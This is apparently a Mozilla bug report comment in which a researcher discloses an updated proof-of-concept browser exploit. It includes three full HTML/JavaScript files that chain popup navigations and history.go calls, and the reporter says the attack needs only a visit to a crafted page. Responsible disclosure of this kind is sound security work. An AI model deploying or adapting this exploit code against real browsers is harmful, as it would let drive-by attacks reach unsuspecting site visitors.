Bug 1528587 Comment 16 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
Hi Team,

I have developed a slightly modified version of my exploit. It turned out that no user interaction is needed at all. This attack could have been used for mass pwnage: it is only required that the victim visits a specially crafted website. Please take it into account. I have attached another video with the proof.

Following is the code I am using now. The timings here are adjusted to high values just in order to show you each step. I am using three HTML files: test.html, test2.html and test3.html. The victim is only required to open test2.html.

test2.html:

```html
<html>
<body>
<script>
// Open a popup on a URL that cannot load (port 1), then walk it through
// several navigations to build up its session history.
win = window.open("https://google.com:1");
setTimeout('win.location = "http://localhost/"', 2000);
setTimeout('win.location = "http://testtest.com:1"', 4000);
setTimeout('win.location = "http://localhost/exploring/test.html"', 6000);
// Replace the current history entry instead of adding a new one.
setTimeout('win.location.replace("http://localhost/exploring/test3.html");', 8000);
</script>
</body>
</html>
```

test.html:

```html
<html>
<body>
<script>
// Shortly after this page loads, go back three entries and then one more.
setTimeout('window.history.go(-3); window.history.go(-1);', 250);
</script>
</body>
</html>
```

test3.html:

```html
<html>
<body>
<p>THIS IS PARAGRAPH</p>
<a href="http://abcd.abcde" id=mylink>link</a>
<script>
// Go back two entries as soon as this page is loaded.
window.history.go(-2);
</script>
</body>
</html>
```